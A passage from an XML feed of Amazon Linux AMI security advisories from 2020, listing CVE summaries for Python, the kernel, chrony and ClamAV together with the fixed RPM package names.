name="rubygem19-io-console" version="0.3" release="33.71.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem19-io-console-0.3-33.71.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2020-1427</id><title>Amazon Linux AMI 2014.03 - ALAS-2020-1427: medium priority package update for python27</title><issued date="2020-08-27 00:20:00" /><updated date="2020-08-31 20:45:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2019-20907:
In Lib/tarfile.py in Python through 3.8.3, an attacker is able to craft a TAR archive leading to an infinite loop when opened by tarfile.open, because _proc_pax lacks header validation.
1856481: CVE-2019-20907 python: infinite loop in the tarfile module via crafted TAR archive
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-20907" title="" id="CVE-2019-20907" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="python27-debuginfo" version="2.7.18" release="2.139.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-debuginfo-2.7.18-2.139.amzn1.x86_64.rpm</filename></package><package name="python27" version="2.7.18" release="2.139.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-2.7.18-2.139.amzn1.x86_64.rpm</filename></package><package name="python27-test" version="2.7.18" release="2.139.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-test-2.7.18-2.139.amzn1.x86_64.rpm</filename></package><package name="python27-devel" version="2.7.18" release="2.139.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-devel-2.7.18-2.139.amzn1.x86_64.rpm</filename></package><package name="python27-libs" version="2.7.18" release="2.139.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-libs-2.7.18-2.139.amzn1.x86_64.rpm</filename></package><package name="python27-tools" version="2.7.18" release="2.139.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-tools-2.7.18-2.139.amzn1.x86_64.rpm</filename></package><package name="python27-tools" version="2.7.18" release="2.139.amzn1" epoch="0" arch="i686"><filename>Packages/python27-tools-2.7.18-2.139.amzn1.i686.rpm</filename></package><package name="python27-test" version="2.7.18" release="2.139.amzn1" epoch="0" arch="i686"><filename>Packages/python27-test-2.7.18-2.139.amzn1.i686.rpm</filename></package><package name="python27" version="2.7.18" release="2.139.amzn1" epoch="0" arch="i686"><filename>Packages/python27-2.7.18-2.139.amzn1.i686.rpm</filename></package><package name="python27-debuginfo" version="2.7.18" release="2.139.amzn1" epoch="0" arch="i686"><filename>Packages/python27-debuginfo-2.7.18-2.139.amzn1.i686.rpm</filename></package><package name="python27-devel" version="2.7.18" release="2.139.amzn1" epoch="0" arch="i686"><filename>Packages/python27-devel-2.7.18-2.139.amzn1.i686.rpm</filename></package><package name="python27-libs" version="2.7.18" release="2.139.amzn1" epoch="0" arch="i686"><filename>Packages/python27-libs-2.7.18-2.139.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2020-1428</id><title>Amazon Linux AMI 2014.03 - ALAS-2020-1428: medium priority package update for python36</title><issued date="2020-08-27 02:25:00" /><updated date="2020-08-31 21:00:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2019-20907:
In Lib/tarfile.py in Python through 3.8.3, an attacker is able to craft a TAR archive leading to an infinite loop when opened by tarfile.open, because _proc_pax lacks header validation.
1856481: CVE-2019-20907 python: infinite loop in the tarfile module via crafted TAR archive
CVE-2019-18348:
An issue was discovered in urllib2 in Python 2.x through 2.7.17 and urllib in Python 3.x through 3.8.0. CRLF injection is possible if the attacker controls a url parameter, as demonstrated by the first argument to urllib.request.urlopen with \r\n (specifically in the host component of a URL) followed by an HTTP header. This is similar to the CVE-2019-9740 query string issue and the CVE-2019-9947 path string issue. (This is not exploitable when glibc has CVE-2016-10739 fixed.)
1727276: CVE-2019-18348 python: CRLF injection via the host part of the url passed to urlopen()
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-18348" title="" id="CVE-2019-18348" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-20907" title="" id="CVE-2019-20907" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="python36-devel" version="3.6.11" release="1.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/python36-devel-3.6.11-1.18.amzn1.x86_64.rpm</filename></package><package name="python36-debuginfo" version="3.6.11" release="1.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/python36-debuginfo-3.6.11-1.18.amzn1.x86_64.rpm</filename></package><package name="python36-libs" version="3.6.11" release="1.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/python36-libs-3.6.11-1.18.amzn1.x86_64.rpm</filename></package><package name="python36-debug" version="3.6.11" release="1.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/python36-debug-3.6.11-1.18.amzn1.x86_64.rpm</filename></package><package name="python36" version="3.6.11" release="1.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/python36-3.6.11-1.18.amzn1.x86_64.rpm</filename></package><package name="python36-tools" version="3.6.11" release="1.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/python36-tools-3.6.11-1.18.amzn1.x86_64.rpm</filename></package><package name="python36-test" version="3.6.11" release="1.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/python36-test-3.6.11-1.18.amzn1.x86_64.rpm</filename></package><package name="python36-devel" version="3.6.11" release="1.18.amzn1" epoch="0" arch="i686"><filename>Packages/python36-devel-3.6.11-1.18.amzn1.i686.rpm</filename></package><package name="python36-libs" version="3.6.11" release="1.18.amzn1" epoch="0" arch="i686"><filename>Packages/python36-libs-3.6.11-1.18.amzn1.i686.rpm</filename></package><package name="python36-test" version="3.6.11" release="1.18.amzn1" epoch="0" arch="i686"><filename>Packages/python36-test-3.6.11-1.18.amzn1.i686.rpm</filename></package><package name="python36-tools" version="3.6.11" release="1.18.amzn1" epoch="0" arch="i686"><filename>Packages/python36-tools-3.6.11-1.18.amzn1.i686.rpm</filename></package><package name="python36-debug" version="3.6.11" release="1.18.amzn1" epoch="0" arch="i686"><filename>Packages/python36-debug-3.6.11-1.18.amzn1.i686.rpm</filename></package><package name="python36" version="3.6.11" release="1.18.amzn1" epoch="0" arch="i686"><filename>Packages/python36-3.6.11-1.18.amzn1.i686.rpm</filename></package><package name="python36-debuginfo" version="3.6.11" release="1.18.amzn1" epoch="0" arch="i686"><filename>Packages/python36-debuginfo-3.6.11-1.18.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2020-1429</id><title>Amazon Linux AMI 2014.03 - ALAS-2020-1429: medium priority package update for python34 python35</title><issued date="2020-08-27 02:29:00" /><updated date="2020-08-31 20:56:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2019-20907:
In Lib/tarfile.py in Python through 3.8.3, an attacker is able to craft a TAR archive leading to an infinite loop when opened by tarfile.open, because _proc_pax lacks header validation.
1856481: CVE-2019-20907 python: infinite loop in the tarfile module via crafted TAR archive
CVE-2019-18348:
An issue was discovered in urllib2 in Python 2.x through 2.7.17 and urllib in Python 3.x through 3.8.0. CRLF injection is possible if the attacker controls a url parameter, as demonstrated by the first argument to urllib.request.urlopen with \r\n (specifically in the host component of a URL) followed by an HTTP header. This is similar to the CVE-2019-9740 query string issue and the CVE-2019-9947 path string issue. (This is not exploitable when glibc has CVE-2016-10739 fixed.)
1727276: CVE-2019-18348 python: CRLF injection via the host part of the url passed to urlopen()
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-18348" title="" id="CVE-2019-18348" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-20907" title="" id="CVE-2019-20907" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="python34-test" version="3.4.10" release="1.51.amzn1" epoch="0" arch="x86_64"><filename>Packages/python34-test-3.4.10-1.51.amzn1.x86_64.rpm</filename></package><package name="python34" version="3.4.10" release="1.51.amzn1" epoch="0" arch="x86_64"><filename>Packages/python34-3.4.10-1.51.amzn1.x86_64.rpm</filename></package><package name="python34-devel" version="3.4.10" release="1.51.amzn1" epoch="0" arch="x86_64"><filename>Packages/python34-devel-3.4.10-1.51.amzn1.x86_64.rpm</filename></package><package name="python34-libs" version="3.4.10" release="1.51.amzn1" epoch="0" arch="x86_64"><filename>Packages/python34-libs-3.4.10-1.51.amzn1.x86_64.rpm</filename></package><package name="python34-tools" version="3.4.10" release="1.51.amzn1" epoch="0" arch="x86_64"><filename>Packages/python34-tools-3.4.10-1.51.amzn1.x86_64.rpm</filename></package><package name="python34-debuginfo" version="3.4.10" release="1.51.amzn1" epoch="0" arch="x86_64"><filename>Packages/python34-debuginfo-3.4.10-1.51.amzn1.x86_64.rpm</filename></package><package name="python34-debuginfo" version="3.4.10" release="1.51.amzn1" epoch="0" arch="i686"><filename>Packages/python34-debuginfo-3.4.10-1.51.amzn1.i686.rpm</filename></package><package name="python34-devel" version="3.4.10" release="1.51.amzn1" epoch="0" arch="i686"><filename>Packages/python34-devel-3.4.10-1.51.amzn1.i686.rpm</filename></package><package name="python34-libs" version="3.4.10" release="1.51.amzn1" epoch="0" arch="i686"><filename>Packages/python34-libs-3.4.10-1.51.amzn1.i686.rpm</filename></package><package name="python34-tools" version="3.4.10" release="1.51.amzn1" epoch="0" arch="i686"><filename>Packages/python34-tools-3.4.10-1.51.amzn1.i686.rpm</filename></package><package name="python34-test" version="3.4.10" release="1.51.amzn1" epoch="0" arch="i686"><filename>Packages/python34-test-3.4.10-1.51.amzn1.i686.rpm</filename></package><package name="python34" version="3.4.10" release="1.51.amzn1" epoch="0" arch="i686"><filename>Packages/python34-3.4.10-1.51.amzn1.i686.rpm</filename></package><package name="python35-devel" version="3.5.9" release="1.27.amzn1" epoch="0" arch="x86_64"><filename>Packages/python35-devel-3.5.9-1.27.amzn1.x86_64.rpm</filename></package><package name="python35-debuginfo" version="3.5.9" release="1.27.amzn1" epoch="0" arch="x86_64"><filename>Packages/python35-debuginfo-3.5.9-1.27.amzn1.x86_64.rpm</filename></package><package name="python35-test" version="3.5.9" release="1.27.amzn1" epoch="0" arch="x86_64"><filename>Packages/python35-test-3.5.9-1.27.amzn1.x86_64.rpm</filename></package><package name="python35-libs" version="3.5.9" release="1.27.amzn1" epoch="0" arch="x86_64"><filename>Packages/python35-libs-3.5.9-1.27.amzn1.x86_64.rpm</filename></package><package name="python35" version="3.5.9" release="1.27.amzn1" epoch="0" arch="x86_64"><filename>Packages/python35-3.5.9-1.27.amzn1.x86_64.rpm</filename></package><package name="python35-tools" version="3.5.9" release="1.27.amzn1" epoch="0" arch="x86_64"><filename>Packages/python35-tools-3.5.9-1.27.amzn1.x86_64.rpm</filename></package><package name="python35-test" version="3.5.9" release="1.27.amzn1" epoch="0" arch="i686"><filename>Packages/python35-test-3.5.9-1.27.amzn1.i686.rpm</filename></package><package name="python35-debuginfo" version="3.5.9" release="1.27.amzn1" epoch="0" arch="i686"><filename>Packages/python35-debuginfo-3.5.9-1.27.amzn1.i686.rpm</filename></package><package name="python35-libs" version="3.5.9" release="1.27.amzn1" epoch="0" arch="i686"><filename>Packages/python35-libs-3.5.9-1.27.amzn1.i686.rpm</filename></package><package name="python35-devel" version="3.5.9" release="1.27.amzn1" epoch="0" arch="i686"><filename>Packages/python35-devel-3.5.9-1.27.amzn1.i686.rpm</filename></package><package name="python35-tools" version="3.5.9" release="1.27.amzn1" epoch="0" arch="i686"><filename>Packages/python35-tools-3.5.9-1.27.amzn1.i686.rpm</filename></package><package name="python35" version="3.5.9" release="1.27.amzn1" epoch="0" arch="i686"><filename>Packages/python35-3.5.9-1.27.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2020-1430</id><title>Amazon Linux AMI 2014.03 - ALAS-2020-1430: important priority package update for kernel</title><issued date="2020-09-03 21:53:00" /><updated date="2024-05-23 21:37:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2020-14386:
A flaw was found in the Linux kernel. Memory corruption can be exploited to gain root privileges from unprivileged processes. The highest threat from this vulnerability is to data confidentiality and integrity as well as system availability.
CVE-2020-14356:
A flaw null pointer dereference in the Linux kernel cgroupv2 subsystem in versions before 5.7.10 was found in the way when reboot the system. A local user could use this flaw to crash the system or escalate their privileges on the system.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-14356" title="" id="CVE-2020-14356" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-14386" title="" id="CVE-2020-14386" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="kernel-tools" version="4.14.193" release="113.317.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-4.14.193-113.317.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo" version="4.14.193" release="113.317.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-4.14.193-113.317.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-x86_64" version="4.14.193" release="113.317.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-4.14.193-113.317.amzn1.x86_64.rpm</filename></package><package name="kernel" version="4.14.193" release="113.317.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-4.14.193-113.317.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="4.14.193" release="113.317.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-4.14.193-113.317.amzn1.x86_64.rpm</filename></package><package name="perf" version="4.14.193" release="113.317.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-4.14.193-113.317.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-devel" version="4.14.193" release="113.317.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-devel-4.14.193-113.317.amzn1.x86_64.rpm</filename></package><package name="perf-debuginfo" version="4.14.193" release="113.317.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-debuginfo-4.14.193-113.317.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.193" release="113.317.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-debuginfo-4.14.193-113.317.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="4.14.193" release="113.317.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-4.14.193-113.317.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-devel" version="4.14.193" release="113.317.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-devel-4.14.193-113.317.amzn1.i686.rpm</filename></package><package name="kernel" version="4.14.193" release="113.317.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-4.14.193-113.317.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo" version="4.14.193" release="113.317.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-4.14.193-113.317.amzn1.i686.rpm</filename></package><package name="perf-debuginfo" version="4.14.193" release="113.317.amzn1" epoch="0" arch="i686"><filename>Packages/perf-debuginfo-4.14.193-113.317.amzn1.i686.rpm</filename></package><package name="perf" version="4.14.193" release="113.317.amzn1" epoch="0" arch="i686"><filename>Packages/perf-4.14.193-113.317.amzn1.i686.rpm</filename></package><package name="kernel-tools" version="4.14.193" release="113.317.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-4.14.193-113.317.amzn1.i686.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.193" release="113.317.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-debuginfo-4.14.193-113.317.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="4.14.193" release="113.317.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-4.14.193-113.317.amzn1.i686.rpm</filename></package><package name="kernel-devel" version="4.14.193" release="113.317.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-4.14.193-113.317.amzn1.i686.rpm</filename></package><package name="kernel-headers" version="4.14.193" release="113.317.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-4.14.193-113.317.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2020-1431</id><title>Amazon Linux AMI 2014.03 - ALAS-2020-1431: medium priority package update for chrony</title><issued date="2020-09-03 22:01:00" /><updated date="2020-09-04 04:14:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2020-14367:
A flaw was found in chrony when creating the PID file under the /var/run/chrony folder. The file is created during chronyd startup while still running as the root user, and when it&#039;s opened for writing, chronyd does not check for an existing symbolic link with the same file name. This flaw allows an attacker with privileged access to create a symlink with the default PID file name pointing to any destination file in the system, resulting in data loss and a denial of service due to the path traversal.
99999:
CVE-2020-14367 chrony: Insecure writing to PID file
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-14367" title="" id="CVE-2020-14367" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="chrony-debuginfo" version="3.2" release="1.27.amzn1" epoch="0" arch="x86_64"><filename>Packages/chrony-debuginfo-3.2-1.27.amzn1.x86_64.rpm</filename></package><package name="chrony" version="3.2" release="1.27.amzn1" epoch="0" arch="x86_64"><filename>Packages/chrony-3.2-1.27.amzn1.x86_64.rpm</filename></package><package name="chrony-debuginfo" version="3.2" release="1.27.amzn1" epoch="0" arch="i686"><filename>Packages/chrony-debuginfo-3.2-1.27.amzn1.i686.rpm</filename></package><package name="chrony" version="3.2" release="1.27.amzn1" epoch="0" arch="i686"><filename>Packages/chrony-3.2-1.27.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2020-1432</id><title>Amazon Linux AMI 2014.03 - ALAS-2020-1432: medium priority package update for python34 python35 python36</title><issued date="2020-09-03 22:08:00" /><updated date="2023-02-17 00:02:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2020-14422:
A vulnerability was found in the way the ipaddress python module computes hash values in the IPv4Interface and IPv6Interface classes. This flaw allows an attacker to create many dictionary entries, due to the performance of a dictionary containing the IPv4Interface or IPv6Interface objects, possibly resulting in a denial of service. The highest threat from this vulnerability is to system availability.
CVE-2019-20907:
A flaw was found in python. In Lib/tarfile.py an attacker is able to craft a TAR archive leading to an infinite loop when opened by tarfile.open, because _proc_pax lacks header validation.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-20907" title="" id="CVE-2019-20907" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-14422" title="" id="CVE-2020-14422" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="python34-tools" version="3.4.10" release="1.52.amzn1" epoch="0" arch="x86_64"><filename>Packages/python34-tools-3.4.10-1.52.amzn1.x86_64.rpm</filename></package><package name="python34-test" version="3.4.10" release="1.52.amzn1" epoch="0" arch="x86_64"><filename>Packages/python34-test-3.4.10-1.52.amzn1.x86_64.rpm</filename></package><package name="python34-debuginfo" version="3.4.10" release="1.52.amzn1" epoch="0" arch="x86_64"><filename>Packages/python34-debuginfo-3.4.10-1.52.amzn1.x86_64.rpm</filename></package><package name="python34-devel" version="3.4.10" release="1.52.amzn1" epoch="0" arch="x86_64"><filename>Packages/python34-devel-3.4.10-1.52.amzn1.x86_64.rpm</filename></package><package name="python34-libs" version="3.4.10" release="1.52.amzn1" epoch="0" arch="x86_64"><filename>Packages/python34-libs-3.4.10-1.52.amzn1.x86_64.rpm</filename></package><package name="python34" version="3.4.10" release="1.52.amzn1" epoch="0" arch="x86_64"><filename>Packages/python34-3.4.10-1.52.amzn1.x86_64.rpm</filename></package><package name="python34-libs" version="3.4.10" release="1.52.amzn1" epoch="0" arch="i686"><filename>Packages/python34-libs-3.4.10-1.52.amzn1.i686.rpm</filename></package><package name="python34-tools" version="3.4.10" release="1.52.amzn1" epoch="0" arch="i686"><filename>Packages/python34-tools-3.4.10-1.52.amzn1.i686.rpm</filename></package><package name="python34" version="3.4.10" release="1.52.amzn1" epoch="0" arch="i686"><filename>Packages/python34-3.4.10-1.52.amzn1.i686.rpm</filename></package><package name="python34-devel" version="3.4.10" release="1.52.amzn1" epoch="0" arch="i686"><filename>Packages/python34-devel-3.4.10-1.52.amzn1.i686.rpm</filename></package><package name="python34-test" version="3.4.10" release="1.52.amzn1" epoch="0" arch="i686"><filename>Packages/python34-test-3.4.10-1.52.amzn1.i686.rpm</filename></package><package name="python34-debuginfo" version="3.4.10" release="1.52.amzn1" epoch="0" arch="i686"><filename>Packages/python34-debuginfo-3.4.10-1.52.amzn1.i686.rpm</filename></package><package name="python35-test" version="3.5.9" release="1.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/python35-test-3.5.9-1.28.amzn1.x86_64.rpm</filename></package><package name="python35-libs" version="3.5.9" release="1.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/python35-libs-3.5.9-1.28.amzn1.x86_64.rpm</filename></package><package name="python35" version="3.5.9" release="1.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/python35-3.5.9-1.28.amzn1.x86_64.rpm</filename></package><package name="python35-tools" version="3.5.9" release="1.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/python35-tools-3.5.9-1.28.amzn1.x86_64.rpm</filename></package><package name="python35-devel" version="3.5.9" release="1.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/python35-devel-3.5.9-1.28.amzn1.x86_64.rpm</filename></package><package name="python35-debuginfo" version="3.5.9" release="1.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/python35-debuginfo-3.5.9-1.28.amzn1.x86_64.rpm</filename></package><package name="python35-tools" version="3.5.9" release="1.28.amzn1" epoch="0" arch="i686"><filename>Packages/python35-tools-3.5.9-1.28.amzn1.i686.rpm</filename></package><package name="python35" version="3.5.9" release="1.28.amzn1" epoch="0" arch="i686"><filename>Packages/python35-3.5.9-1.28.amzn1.i686.rpm</filename></package><package name="python35-libs" version="3.5.9" release="1.28.amzn1" epoch="0" arch="i686"><filename>Packages/python35-libs-3.5.9-1.28.amzn1.i686.rpm</filename></package><package name="python35-debuginfo" version="3.5.9" release="1.28.amzn1" epoch="0" arch="i686"><filename>Packages/python35-debuginfo-3.5.9-1.28.amzn1.i686.rpm</filename></package><package name="python35-devel" version="3.5.9" release="1.28.amzn1" epoch="0" arch="i686"><filename>Packages/python35-devel-3.5.9-1.28.amzn1.i686.rpm</filename></package><package name="python35-test" version="3.5.9" release="1.28.amzn1" epoch="0" arch="i686"><filename>Packages/python35-test-3.5.9-1.28.amzn1.i686.rpm</filename></package><package name="python36-test" version="3.6.12" release="1.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/python36-test-3.6.12-1.19.amzn1.x86_64.rpm</filename></package><package name="python36-devel" version="3.6.12" release="1.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/python36-devel-3.6.12-1.19.amzn1.x86_64.rpm</filename></package><package name="python36" version="3.6.12" release="1.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/python36-3.6.12-1.19.amzn1.x86_64.rpm</filename></package><package name="python36-debuginfo" version="3.6.12" release="1.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/python36-debuginfo-3.6.12-1.19.amzn1.x86_64.rpm</filename></package><package name="python36-debug" version="3.6.12" release="1.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/python36-debug-3.6.12-1.19.amzn1.x86_64.rpm</filename></package><package name="python36-tools" version="3.6.12" release="1.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/python36-tools-3.6.12-1.19.amzn1.x86_64.rpm</filename></package><package name="python36-libs" version="3.6.12" release="1.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/python36-libs-3.6.12-1.19.amzn1.x86_64.rpm</filename></package><package name="python36-tools" version="3.6.12" release="1.19.amzn1" epoch="0" arch="i686"><filename>Packages/python36-tools-3.6.12-1.19.amzn1.i686.rpm</filename></package><package name="python36" version="3.6.12" release="1.19.amzn1" epoch="0" arch="i686"><filename>Packages/python36-3.6.12-1.19.amzn1.i686.rpm</filename></package><package name="python36-debug" version="3.6.12" release="1.19.amzn1" epoch="0" arch="i686"><filename>Packages/python36-debug-3.6.12-1.19.amzn1.i686.rpm</filename></package><package name="python36-test" version="3.6.12" release="1.19.amzn1" epoch="0" arch="i686"><filename>Packages/python36-test-3.6.12-1.19.amzn1.i686.rpm</filename></package><package name="python36-libs" version="3.6.12" release="1.19.amzn1" epoch="0" arch="i686"><filename>Packages/python36-libs-3.6.12-1.19.amzn1.i686.rpm</filename></package><package name="python36-debuginfo" version="3.6.12" release="1.19.amzn1" epoch="0" arch="i686"><filename>Packages/python36-debuginfo-3.6.12-1.19.amzn1.i686.rpm</filename></package><package name="python36-devel" version="3.6.12" release="1.19.amzn1" epoch="0" arch="i686"><filename>Packages/python36-devel-3.6.12-1.19.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2020-1433</id><title>Amazon Linux AMI 2014.03 - ALAS-2020-1433: important priority package update for clamav</title><issued date="2020-09-14 20:55:00" /><updated date="2020-09-16 18:15:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2020-3481:
Fixed a vulnerability in the EGG archive module in ClamAV 0.102.0 - 0.102.3 that could cause a denial-of-service (DoS) condition. Improper error handling could cause a crash due to a NULL pointer dereference. This vulnerability is mitigated for those using the official ClamAV signature databases because the file type signatures in daily.cvd will not enable the EGG archive parser in affected versions.
CVE-2020-3481
CVE-2020-3350:
Fixed a vulnerability a malicious user could exploit to replace a scan target directory with a symlink to another path to trick clamscan, clamdscan, or clamonacc into removing or moving a different file (such as a critical system file). The issue would affect users that use the --move or --remove options for clamscan, clamdscan and clamonacc.
CVE-2020-3350
CVE-2020-3327:
Fixed a vulnerability in the ARJ archive-parsing module in ClamAV 0.102.3 that could cause a denial-of-service (DoS) condition. Improper bounds checking resulted in an out-of-bounds read that could cause a crash. The previous fix for this CVE in version 0.102.3 was incomplete. This fix correctly resolves the issue.
CVE-2020-3327
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-3327" title="" id="CVE-2020-3327" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-3350" title="" id="CVE-2020-3350" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-3481" title="" id="CVE-2020-3481" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="clamav-data" version="0.102.4" release="1.44.amzn1" epoch="0" arch="noarch"><filename>Packages/clamav-data-0.102.4-1.44.amzn1.noarch.rpm</filename></package><package name="clamav-devel" version="0.102.4" release="1.44.amzn1" epoch="0" arch="x86_64"><filename>Packages/clamav-devel-0.102.4-1.44.amzn1.x86_64.rpm</filename></package><package name="clamav-milter" version="0.102.4" release="1.44.amzn1" epoch="0" arch="x86_64"><filename>Packages/clamav-milter-0.102.4-1.44.amzn1.x86_64.rpm</filename></package><package name="clamav-debuginfo" version="0.102.4" release="1.44.amzn1" epoch="0" arch="x86_64"><filename>Packages/clamav-debuginfo-0.102.4-1.44.amzn1.x86_64.rpm</filename></package><package name="clamav-filesystem" version="0.102.4" release="1.44.amzn1" epoch="0" arch="noarch"><filename>Packages/clamav-filesystem-0.102.4-1.44.amzn1.noarch.rpm</filename></package><package name="clamd" version="0.102.4" release="1.44.amzn1" epoch="0" arch="x86_64"><filename>Packages/clamd-0.102.4-1.44.amzn1.x86_64.rpm</filename></package><package name="clamav" version="0.102.4" release="1.44.amzn1" epoch="0" arch="x86_64"><filename>Packages/clamav-0.102.4-1.44.amzn1.x86_64.rpm</filename></package><package name="clamav-lib" version="0.102.4" release="1.44.amzn1" epoch="0" arch="x86_64"><filename>Packages/clamav-lib-0.102.4-1.44.amzn1.x86_64.rpm</filename></package><package name="clamav-update" version="0.102.4" release="1.44.amzn1" epoch="0" arch="x86_64"><filename>Packages/clamav-update-0.102.4-1.44.amzn1.x86_64.rpm</filename></package><package name="clamav-db" version="0.102.4" release="1.44.amzn1" epoch="0" arch="x86_64"><filename>Packages/clamav-db-0.102.4-1.44.amzn1.x86_64.rpm</filename></package><package name="clamav-db" version="0.102.4" release="1.44.amzn1" epoch="0" arch="i686"><filename>Packages/clamav-db-0.102.4-1.44.amzn1.i686.rpm</filename></package><package name="clamav-debuginfo" version="0.102.4" release="1.44.amzn1" epoch="0" arch="i686"><filename>Packages/clamav-debuginfo-0.102.4-1.44.amzn1.i686.rpm</filename></package><package name="clamav-update" version="0.102.4" release="1.44.amzn1" epoch="0" arch="i686"><filename>Packages/clamav-update-0.102.4-1.44.amzn1.i686.rpm</filename></package><package name="clamd" version="0.102.4" release="1.44.amzn1" epoch="0" arch="i686"><filename>Packages/clamd-0.102.4-1.44.amzn1.i686.rpm</filename></package><package name="clamav" version="0.102.4" release="1.44.amzn1" epoch="0" 